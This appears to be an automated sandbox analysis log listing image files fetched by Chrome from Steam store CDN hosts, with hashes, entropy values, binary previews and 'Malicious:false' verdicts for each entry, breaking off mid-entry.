        Preview:.PNG........IHDR...X...........v....pHYs................)iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c006 79.dabacbb, 2021/04/14-00:39:44 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmp:CreatorTool="Adobe Photoshop 22.4 (Windows)" xmp:CreateDate="2021-08-02T17:48:06+03:00" xmp:MetadataDate="2021-08-03T14:25:01+03:00" xmp:ModifyDate="2021-08-03T14:25:01+03:00" dc:format="image/png" xmpMM:InstanceID="xmp.iid:115ce010-caac-d94b-a3c2-43ac42e3d750" xmpMM:DocumentID="adobe:docid:photoshop:33181849-1956-b84c-bebf-cbfacf52752f" xmp
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 600 x 240, 8-bit/color RGBA, non-interlaced
        Category:downloaded
        Size (bytes):192926
        Entropy (8bit):7.983043460060286
        Encrypted:false
        SSDEEP:3072:GkWv4XwTi7FdujXUMfMBuwjJ8qrFYET0fFIbbaTfftzp2eg9I2gE9iEsCXNP:Kv4Xz7PkXUMfMuwjjrKEYIv4zYlriE3P
        MD5:AC9B53E44B29BA72CD901C740862CE20
        SHA1:DFD2B014E8D1E42B99D5BF0E98FCB77E081EA148
        SHA-256:98B1D3353F0E92E91BCDC02396E0CA5FCA6A3FE12799409B9F7C5F3E9D948CF3
        SHA-512:7DBCA63DAD7977EE346744A8B95AB6CC9067FE1C14CCD7A538658A5172B3D62841B94ECAD53F74925E9D7D11878D273BE9D531F0DE614A4FDE626704986BD602
        Malicious:false
        Reputation:low
        URL:https://cdn.cloudflare.steamstatic.com/steam/apps/1643320/extras/tsa.png?t=1705420866
        Preview:.PNG........IHDR...X...........v....pHYs................)iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c006 79.dabacbb, 2021/04/14-00:39:44 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmp:CreatorTool="Adobe Photoshop 22.4 (Windows)" xmp:CreateDate="2021-08-02T17:48:06+03:00" xmp:MetadataDate="2021-08-03T14:25:40+03:00" xmp:ModifyDate="2021-08-03T14:25:40+03:00" dc:format="image/png" xmpMM:InstanceID="xmp.iid:6569d4d6-1e1f-5940-9dc5-b2519ba6704f" xmpMM:DocumentID="adobe:docid:photoshop:f99c1235-4fbf-2949-bcdc-0e3e2bebecab" xmp
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:GIF image data, version 89a, 8 x 8
        Category:dropped
        Size (bytes):63
        Entropy (8bit):4.449633005985324
        Encrypted:false
        SSDEEP:3:CtMfhExlHr/lXYrP:OCP
        MD5:D1C5AA274C0F681D02317D33026E93D2
        SHA1:07CE7DDD50B6C56DC35A08128A161CDD78C08BE4
        SHA-256:563401248387CB3CF47D04E1DDA78508467889CE4EBB80D24A074E0C24A0183C
        SHA-512:5CDC105BA2500B00A8FAA70B89CA62C28F6BEC16B2198452AE408C65C316293E1512731F3EBBF811C83F3251D34C1EB5B6D8F7E1A3DCA6FB6943B8E858FDFB4D
        Malicious:false
        Reputation:low
        Preview:GIF89a.......MML...&&&...!.......,..............w....h!f.n....;
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 500x350, components 3
        Category:dropped
        Size (bytes):64125
        Entropy (8bit):7.966791375074659
        Encrypted:false
        SSDEEP:1536:Nmz4iejiNh0PMXfMR0eSmEnMM5JuQ8hNd++I:NmzyGAPR0eSxJ1MY+I
        MD5:D36402812E0C39296FC5C846F6D03D4A
        SHA1:10E5B2C9671086B456660AF95E80A806226D558A
        SHA-256:4A5EF4F233C32B83DEDCF77DB028AEFF8BE5836C1FD589571F22855958D76543
        SHA-512:21680A941D87A58FDAA418EE6BC12070CE172B53C409AE7B4C5115FFD58671290A9B183461078F341615DCC38C65C734B7E6E98D47589C51446E7EDAFFD0C60E
        Malicious:false
        Reputation:low
        Preview:......Exif..II*.................Ducky.......<......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.dba3da3b5, 2023/12/15-10:42:37 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:08E3DEAC7543EA11BDE8B47652FD8F39" xmpMM:DocumentID="xmp.did:C8DAD03D13B011EF8E89969DB002DB90" xmpMM:InstanceID="xmp.iid:C8DAD03C13B011EF8E89969DB002DB90" xmp:CreatorTool="Adobe Photoshop CC 2019 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:abbeb306-73fa-3c48-b973-6bc0d661673a" stRef:documentID="adobe:docid:photoshop:0de3147e-02ed-f744-91cf-5e02683ce0e6"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...XICC_PROFILE......HLino....mntrRGB XYZ .
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 25 x 25, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):1816
        Entropy (8bit):7.335413459481553
        Encrypted:false
        SSDEEP:48:mwqQNn2xkJ3n7OO8oPTFC+6vUycoKGCAHcDsr9CQ:6Y2w72o7Fh68yLdHcYr9CQ
        MD5:C8A9A5322C7A32D42405AEC4ECC91E8C
        SHA1:A6A04E08067EBBC6E9D70361FAD164CAB634BD9D
        SHA-256:02E650004D02B883D1F77E3C9AB18F556D470CC4F41500917D0CDA68EC62D197
        SHA-512:F057B313CE4AEED427AC04B1278A8FFE105843CD0998CAC5E01DDBCD53CAFFCB5584239646A73C40281D671D22C2E163E0FC3F1A589FFF9E9479CAC206EB241B
        Malicious:false
        Reputation:low
        Preview:.PNG........IHDR...............c....tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:D62C327C9D6211E6BC85ED92E7B3F4DB" xmpMM:DocumentID="xmp.did:D62C327D9D6211E6BC85ED92E7B3F4DB"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:D62C327A9D6211E6BC85ED92E7B3F4DB" stRef:documentID="xmp.did:D62C327B9D6211E6BC85ED92E7B3F4DB"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>`......IDATx.U.k.W.?....fg?21..hT.......H-..VQ.-.......`...(>H...R,B.7...t.iM.i01...nv....;....1...M....a...=...
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 18 x 18, 8-bit/color RGBA, non-interlaced
        Category:downloaded
        Size (bytes):545
        Entropy (8bit):7.444562549583052
        Encrypted:false
        SSDEEP:12:6v/7uyLaH660d23xvW7xQ/8Dbw7Xf1iE5i6+kkACy4N:za6083aS/8Dbwv1iEYvK4N
        MD5:89CDC062C8ADEB86C0646386B16BE89A
        SHA1:E14D6483C5CC89FCFBD81D716EC6160F211011D0
        SHA-256:ACFA81026EF1DBB82A8276FAB382C15433934AD82C80DCAD64F87FD907F447F2
        SHA-512:3F288464BAC7875BD1C63800543056BA8A576F973FE26D374AAD1853AC4F25AF0CD3AF74002130200CF1B16D76AD3896888D26065E10AC7D731F0B638236E183
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/images/v6/close_btn.png
        Preview:.PNG........IHDR.............V.W....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx...K.Q....AI.Ue.n.E."..'...M..u......(!.,.(..A-..DlWbQ...\Klf\dw....{~|..3W.X......,7.6.V...A..YCm...+.............O..6>.~..M.~.6..l..o[.y.4B.$.F_/Z.. ..X.;.>6.Os+.q6bZ..b...(.....2L.x^b'....?.....g..XAA.d..z..M..p.c|...W<]2DS. .-+.y...;p1.on..."}q.RU..2..W)*..'....ZW..h..@.....Y.E7D.|...k...f..,r.:...8.f..m#3%...#Y.NW`.!Y.....s.?.......)Gj..L../.7..Z.V.!....1N...P.|.]....,..5....R..a.N..E.U....#....5_l.$..........$......IEND.B`.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, progressive, precision 8, 940x250, components 3
        Category:downloaded
        Size (bytes):71723
        Entropy (8bit):7.975046220353434
        Encrypted:false
        SSDEEP:1536:4EIBQ3IpJ/fDOsyOHl9eQ4A9fFVyrYbYo95yAj8dmZ4W0AIX:4EI23aasyGFfOrU9Zj8O0AU
        MD5:02A0ADB8033EACFB33FBA9BB1B771B71
        SHA1:BE35A2AF2AEC81B8D1C7B091713446C841964948
        SHA-256:0FD28202E936544C1119CFCB0696ECC75576D64D7A12AC04912B9C9A1AD4612F
        SHA-512:37F93BAAFD7502D1143F98298D5E94225C4CFC4EC8347C23D3BACF11BA3817E3883DFF5DC502AC25BE0DCEA2E534A29E2814E718540CBFF2BE38A5B9867FED67
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/clusters/sale_autumn2019_assets/54b5034d397baccb93181cc6/deck_banner_animated_static_english.jpg?t=1713912919
        Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 115x65, components 3
        Category:downloaded
        Size (bytes):2704
        Entropy (8bit):7.791683215638868
        Encrypted:false
        SSDEEP:48:v9j+rILNX6hGc3rIqSY1b0bqzYZyM6D49WF9XxK2cQoBQNungFmmB:vFNqhX7IroblApouWFDrBNUgFDB
        MD5:DE9B34702986AA4D4274E09A8D5F4F9D
        SHA1:1A9B9D65F55DB65AB404D07DDA348C398013276F
        SHA-256:3A885981F1021B41428190B12F8952996BC23A991770C27E69069028E6F2958B
        SHA-512:1A31801543F171CE4C93A063DE29A97E34FBBFE037558BB40433A2E67DE504AB97C81D37BB341388A1CB01FFBA0A362EBABE6232DD3D5BF1E7A48C2D8A1B1859
        Malicious:false
        Reputation:low
        URL:https://cdn.cloudflare.steamstatic.com/steam/apps/1643320/ss_1b058a23ebdc992d906ef410d64acc467c2c1a34.116x65.jpg?t=1705420866
        Preview:......JFIF.....H.H.....C....................................................................C.......................................................................A.s...........................................;.........................!1A.."Qq...#2a..34Br...$b..CRs................................&.....................!1..AQ...."Baq.............?......a.:.!..u,.F.~i...X..#...>b.l.....2s.#..UG+.G%.*.i..{9....7....W.t....../..~.msK.E1.#%.u..U...?....S'.l...H...a\2..o.#.e....R.U....Y$.0.......Aw.}.\..E)UD.YH._.....]...=.4.u...5fN..'...R5..o.)Pp^.y...w..t..J.O..@..(G.OC.h..`.....{U..Z.gko..$v..[.......I..(F.m..Y.[A.e..L.9...4........&.4.o..<...c.[...l..?.[.6.L."M(...r..).~.#4.m.on.2.. ....c$eur//..[........+gL?jy..<.g.A..(.....=...+P.R.xP>U.6.......*.....n8.P.=.U..J.u...K...=Y+..).-.)'..v.....J.v..J....A c...L...V...z..Tf.F.n.T....'.|.S8/N.I....ci.r.2.p..|.....t<c.?.kV,d....'[. ...;U..O~.4..^.......{BO.X.Af..x..'.[c..V..../.d.n[w...(..%c.4L..D..5.L........e&
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 616 x 1, 8-bit/color RGBA, non-interlaced
        Category:downloaded
        Size (bytes):1120
        Entropy (8bit):6.456245824682228
        Encrypted:false
        SSDEEP:24:3y1he91Wwjx82lY2T3ouV5uOyJ3VeESGZDGRPrb9kc:3wqQNn2xaFJ3iBec
        MD5:EDB0161B9DB9F6489684D466613502C3
        SHA1:903F5DADE092B44321A6ECF45CFEBD18375164E6
        SHA-256:FD844A25854B8FF87048D44CD4B0D383A6BF3A69AEF5066A04BB1AFD628E1F36
        SHA-512:607927D1ACA226B0C6EAE6ADD27B4962C69478FED6093B5FE736D82F2BD9B83562F4951124449AD7C1CC45CD393FDF9ED7D9736ECB0F182E6755FE1FC668CF4E
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/images/v6/maincol_gradient_rule.png
        Preview:.PNG........IHDR...h.........j.R.....tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:17658E6BE6CB11E3B5A6BB61795E9834" xmpMM:DocumentID="xmp.did:17658E6CE6CB11E3B5A6BB61795E9834"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:17658E69E6CB11E3B5A6BB61795E9834" stRef:documentID="xmp.did:17658E6AE6CB11E3B5A6BB61795E9834"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>......IDATx.V...@...:T..E.:T..R[..&..... .}<..#..y..}.2d.......D...ct... l..L....^...I.g|..m.M....3>...,.C..d.&.?.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 118x118, segment length 16, baseline, precision 8, 184x69, components 3
        Category:downloaded
        Size (bytes):4522
        Entropy (8bit):7.894880048690622
        Encrypted:false
        SSDEEP:96:rPToi6+S6X6lVhH5tenJWEotqSGecuePYIRun6DlvA/nRVEXhdn:jTosSnlHZtenJ/otqSGaGu6ZApVyj
        MD5:2E6FCFE977F83AA4B97AF8B979602AEB
        SHA1:0E5427CF9F3F084B7F2920F4361A0D2E937F1349
        SHA-256:75660BBCAF03CAF3DB55DD34A246D19A10A8D21E8C0F8BDE94B2CE8C81796A98
        SHA-512:46E7C492C6B6F1A9CC8171F09118335EDB5C1BF6D8C9A0D8E4102545CB726ADD67D4C4D5757992B1C553FEE6186B3B5C912F8304BB490D9500E7851C02FAC9C7
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/1604030/capsule_184x69.jpg?t=1715590903
        Preview:......JFIF.....v.v.....C....................................................................C.......................................................................E..............................................A.........................!...1AQ."aq.2.R...#$B.....3FScdr.....................................&......................!.1AQ.".#aq3B.............?..N>...E.I...B...z.z....%=G.f..M.Zw-..f.%...S.O].....X.`._~pr4...h.ygJ2@I..X.....n.....m...d..QQB..3.%U....aK..{l.....{r...s.Li..u.8...>...#....Em......}4*.uF3.tN..>.7.....\.Z.fy.C.4...i]...*JS...e!...Z".d..X).=.t...b.E..........]b..!.......)..]gU...'...;.bw.......P.n...#G.....>f.EL...7%...)..j..##.........'..V..t.-..N*6..G.....#....+%4..R......k&;....9t.....Uxq.....ak6.K.q.5.....0.'.;...S.v1.\k$...!55h.t...u..=.Oz..Osy...2.....,.U.W.q..K^.ZI.zW..Y.#l-.}.tS...t-Ac.....EN..`..(..L..W...M..1.l.,.o.t.'+%...i.g55..I,.+.%.>.<..:.50...}....a.FNp..i.$..AM7p..uX.D'%D....y..F.$`..x..".8...,.c.S*'.2ut..\EQ.d.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:GIF image data, version 89a, 1 x 1
        Category:dropped
        Size (bytes):807
        Entropy (8bit):0.4261982118465057
        Encrypted:false
        SSDEEP:3:CUlFE/xlzeze:zFEGze
        MD5:39BC952559E5A8F4E84BA035FB2F7390
        SHA1:4F415467396B4A50149373CA75BCB4C04C2F60B6
        SHA-256:8F73EF54EFC672061F69CA881FE318DCCC6DD67D993CBB8E76E53E52C84EE493
        SHA-512:C7E107E803941A965A173EC8DC7DDFB052C042AB0070E92E5FF47D0E02ECB38446BDC13BBF201D68B2F5696AFBEEA1AF494A65EED4B086EF368CF147892E4409
        Malicious:false
        Reputation:low
        Preview:GIF89a.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................!.......,................;
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 52 x 32, 8-bit/color RGBA, non-interlaced
        Category:downloaded
        Size (bytes):1127
        Entropy (8bit):6.430139088018347
        Encrypted:false
        SSDEEP:24:Iy1he91Wwjx82lY2T3ouVBTyJ3VrmmGQ6OuRji/yPP:IwqQNn2xiJ3dI1RjiaPP
        MD5:ACEE12334C5438C439DEF6F937F8FA88
        SHA1:CBBF31B7B4131C3B7669CB6916C6D8AB28A25465
        SHA-256:4E2AC4609F7FFEBC2B6379D0FF0B24759457D442BE87B8567DEB9B0EF1205C3F
        SHA-512:93B94BC83C0EB3C6CEB3206F41031A90BECBBDBFEFDE473248304936397F0572660B9EFA90132469DD7BE20E2D2817E91A341DF19CDCD0617649A72A1C54A03F
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/images/v6/ico/ico_cards.png
        Preview:.PNG........IHDR...4... .....]?[f....tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:07E06082E2BC11E3A3F5FC66991AB4CD" xmpMM:DocumentID="xmp.did:07E06083E2BC11E3A3F5FC66991AB4CD"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:07E06080E2BC11E3A3F5FC66991AB4CD" stRef:documentID="xmp.did:07E06081E2BC11E3A3F5FC66991AB4CD"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>........IDATx.b...?.p.....f....N4p.q ..........W..?......'*x..........,.<...c..!....HlP`..o.1.`..).V..y......F.x.$9..Q
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 616x353, components 3
        Category:downloaded
        Size (bytes):43109
        Entropy (8bit):7.9723532246810915
        Encrypted:false
        SSDEEP:768:+pimLkMMgrhye/+NN2iu5KGp9wXuc/4eiyrpUW7Ga:+pimkmh9/+Y5z9wXuc/li25x
        MD5:84DE3D084C80944273EB22B46E79F375
        SHA1:C81DA12102C514A298AF2C15CA05EEFCC33CE6D1
        SHA-256:80F97A0EF53385795BF5EDBC06F6DFBC47516AC1216013594D484B4EA7D1088C
        SHA-512:B0255C12F4E800276EFCC426EF229A4EF8055AA3A34D1FAE1639A9A15312237291E06071E698627245572D30DAD889DDF1E04BBB9BD3169D68FC0B5E55F1243F
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/1085660/capsule_616x353.jpg?t=1715101527
        Preview:......JFIF.............C....................................................................C.......................................................................a.h............................................L........................!1AQa..."q.2...#B......Rbr..3..$4CSs.Dc....%..5t........................................................!.1.A."Qaq2B....3R#...............?..}..g..?>u.y...5...Q&$.$.^.@..}A.h..M..%Wc...b..:..;..h..hx.............h<.*.M.0.[.!BN^'.`..A...8...,.......(....:.."".b"./...?..V.$.._.D...=...#.....`N....V1.t;...@.....j.F....(...8."..h...sPld...mt..G%.(......Z.Kl.B......W.n.......H=c..N...n\v.FP.....3.W..,rB.9x}.EQ(...k.g.zT.a^s.&|.D.A.p.RL..PL...*...Z....6...X....;...B.....|0..s.a.....#.uV.6S......5.N.f.l.a......:.}y|.X.Li@..\...Z.&?sZ.$.9~.....Q.....x.-...c.u.(....iw*5..*......eb.7..C.$Pr.d>....B..;O..#...n.YR.)+.Z#w.m.;.....@..U.k.Q.q.Z....2.p.CTA40v#.X...!N....1X.b(*...,..>T:.SU}...\..T2.,....*".tZ......'2...B..-.x8.....x.JH!sG
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 184x69, components 3
        Category:dropped
        Size (bytes):7363
        Entropy (8bit):7.917835636055964
        Encrypted:false
        SSDEEP:192:oNQ97XWou+rquyq49wz8uYiK83v79Uc2PlaOVd:oNqm5+rM1w4jiK83v79MFd
        MD5:4F672C7801089268FA2C9E105A654805
        SHA1:E9946A32BCA300E756EED31E98098982E5DF4D7E
        SHA-256:4FECC949DB57298EE409C2B19DC67DCE6C1627C4551688633F3C68F40999564D
        SHA-512:F493AED94437026F1E4F2ACAE5E2DBC750AA8D81FFE7D5AACB1CAAAE3A333A84F75E4AA60CC8FD2BE32BBFE851A93B29BCD1142E105BF3693FD4DB732BF24370
        Malicious:false
        Reputation:low
        Preview:......JFIF.............C....................................................................C.......................................................................E..............................................@...........................!.1.A."2Qa...#BW....$3Rbq...Gr.......................................@........................!1..AQa."q...2R....BT....#3b..r...Ccs.............?..q..]...R......)FaJXR.R....)GhR....)D)K.R.R....)aJ!JC.Q..Q.Q.Q.Q.Q.R`.R.U...zY35Z..2]j.K...)D..* .H.."2X.~.E. ..BA$y.T)iG.b.F1..T......C..&..;...L.*A......=......BB|.l+...[..L.f:.d..Rj..%...AR6..Qe..).N.....7z.)>`..|.8..n........V......1.@&f..kh-.O....N"...R.R..B.......$)D)D)A.)..=....R.B...*...m.9..X.+.4.kc....i'...H$...{.<-.YS.<.'..y...:.........f..[=<YS7$.....-.i.[.O.x.G...w<;.....;Yt.Z.d..M.'..5..c....%K<....u0).>N.51R..e.....u.I:.J6...ai$..B;p#9~.p..^..xz{..Gp..0$.U....6..%W.......`OH...v...k.....0....%..f......p..Q.....\.W..h6.{...@.u.s.&I....A...8....E...4..\.....51..feJ
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:SVG Scalable Vector Graphics image
        Category:downloaded
        Size (bytes):517
        Entropy (8bit):4.513978417181636
        Encrypted:false
        SSDEEP:12:trw90ruJlrlDyoEcd7AWVbgthDdYHptmekRHF4TndtiHp:tC0ruJlluoEsEWVgtoO2ndtY
        MD5:C9DD22AF273DE76CE331C16CA162C3CB
        SHA1:1654CC37A3E647C7A4274FAE22A987CE55852D3B
        SHA-256:80DD1F0A38053D83CCB30EF39E0A34DB0C22C47F097D48857DE8321DF50F63B2
        SHA-512:0E4AE92807DF74DCC7B8EB037937528DFF0A4735E37F575DFEFB96A59C89E3AB993016460DC725421291B8167393317A24912857409EE5FE33B3918CC2583B03
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/images/mobile/ResponsiveChevron.svg
        Preview:<svg width="8" height="13" viewBox="0 0 8 13" fill="none" xmlns="http://www.w3.org/2000/svg">..<path d="M1.58121 12.7508C1.409 12.9121 1.18982 13 0.931507 13C0.414873 13 0 12.6189 0 12.1353C0 11.8935 0.10959 11.6736 0.289629 11.5051L5.76908 6.49267L0.289629 1.49493C0.10959 1.32638 0 1.09921 0 0.864713C0 0.38106 0.414873 0 0.931507 0C1.18982 0 1.409 0.0879369 1.58121 0.249154L7.67123 5.81849C7.89041 6.00902 7.99217 6.24352 8 6.5C8 6.75648 7.89041 6.97632 7.67123 7.17418L1.58121 12.7508Z" fill="white" />..</svg>..
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:GIF image data, version 89a, 1 x 1
        Category:downloaded
        Size (bytes):43
        Entropy (8bit):3.0314906788435274
        Encrypted:false
        SSDEEP:3:CUkwltxlHh/:P/
        MD5:325472601571F31E1BF00674C368D335
        SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
        SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
        SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/shared/images/trans.gif
        Preview:GIF89a.............!.......,...........D..;
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 600x337, components 3
        Category:dropped
        Size (bytes):106862
        Entropy (8bit):7.976963116284103
        Encrypted:false
        SSDEEP:1536:bW5kMUH9OBwbFwBo0PRnw3nnV8LrjfynC5o1A8x5DNQxSoRo2sxCLMronHljWabo:qKdOqbWbJwXErjf95o1TrGx/Ro5CL0Mo
        MD5:0643BE00B28E177774CC634A1636E1DA
        SHA1:D7CB603EBA5D7AA8062A6B40EC93190F93EA5081
        SHA-256:3EFAE2A18709B6EEED16EAD26109E3D4BCD07ABFCA97E748F5102A3E6FC1F6A7
        SHA-512:27D9C9883B6F1A2E7344B9F0DF2FF3E225D3C5977E261526B937E7F6CF1E4AE75DEC7B15E26781FB9A8B42F880538DA12BBA08CA52BDEBA1040E84AF1670303C
        Malicious:false
        Reputation:low
        Preview:......JFIF.............C....................................................................C.......................................................................Q.X............................................S.........................!.1.."A.Qa2q...#B....3R...$456brs....%7tu..C..S....c.....................................A......................!..1AQa.."q.......2...#3.Br.4R$b..5%CS..............?...^.7.)>.W............O'.e..=.f.'.....J..i.........;.l....r4E.$.....>.t....m.R.Sy.....x...... .h.a'u4.].4..5d{.Ie..N..K.&......\H.m.l........T...}Y...cC%"...P.r.)i.Y.2.?T.r..cLp.D_.......3oi..$..^..U....{|O$tw._..".\m...wd.q.K-pa.C.&....b.R.}=w.n..W...u.:....7.g mc..\..n.F..P.l-;O....;.*74k%ZWia.E(.... ...(......8..|.a...t[...#hp.#^.tV.t...VEO..F.e.w..l..1. .~..}.6.;...J...".[.......o..$.7.P..{r. ....vx.....c........V....Q..Nhh.{..BQ...2.PNH....<.I..{.)....<%9.g...:..>$x.l.Jjar.T.......'.....y<...g.FVGh\D.o^..... 0.....+0I...q..Y ..Vy....6......9...,.1.p..s.l....t.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 460x215, components 3
        Category:dropped
        Size (bytes):38138
        Entropy (8bit):7.9774158194225935
        Encrypted:false
        SSDEEP:768:Dd8cAF6/J8MCZ0o28wyMjTWXMyv/0srzBz51d9yB46X:Oi/4ZnpMGX90GNz51d984C
        MD5:84F07F8CF9BC037399CCB9FC52036773
